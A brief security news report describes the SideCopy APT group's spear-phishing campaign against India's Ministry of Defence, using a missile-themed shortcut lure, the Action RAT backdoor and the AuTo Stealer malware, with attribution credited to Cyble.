An advanced persistent threat (APT) group known as SideCopy has been identified as the perpetrator of a new phishing campaign designed to target India’s Ministry of Defence. SideCopy is a Pakistani-based group with a history of targeting India and Afghanistan.
The campaign uses spear-phishing emails that contain a ZIP archive file with a Windows shortcut file (.LNK) disguised as information about the K-4 ballistic missile developed by DRDO. The group also deploys the Action RAT backdoor and a new information-stealing malware called AuTo Stealer, which can gather and exfiltrate various types of files.
SideCopy is known for emulating the infection chains associated with SideWinder to deliver its own malware.
The group has been active since at least 2019 and has been linked to Transparent Tribe, another threat group of Pakistani origin.
Attack chains are initiated using spear-phishing emails to gain initial access. Once the .LNK file is executed, an HTML application is retrieved from a remote server that displays a decoy presentation while stealthily deploying the Action RAT backdoor.
In addition to gathering information about the victim machine, the malware is capable of running commands sent from a command-and-control (C2) server, harvesting files, and dropping follow-on malware. The group continuously evolves its techniques and incorporates new tools into its arsenal, according to Cyble, the company that attributed the operation to SideCopy.
This is not the first time that SideCopy has employed Action RAT in its attacks directed against India.
In December 2021, a set of intrusions that breached several ministries in Afghanistan and a shared government computer in India to steal sensitive credentials were disclosed. The latest findings come a month after the adversarial crew was spotted targeting the Indian Army in a separate campaign.
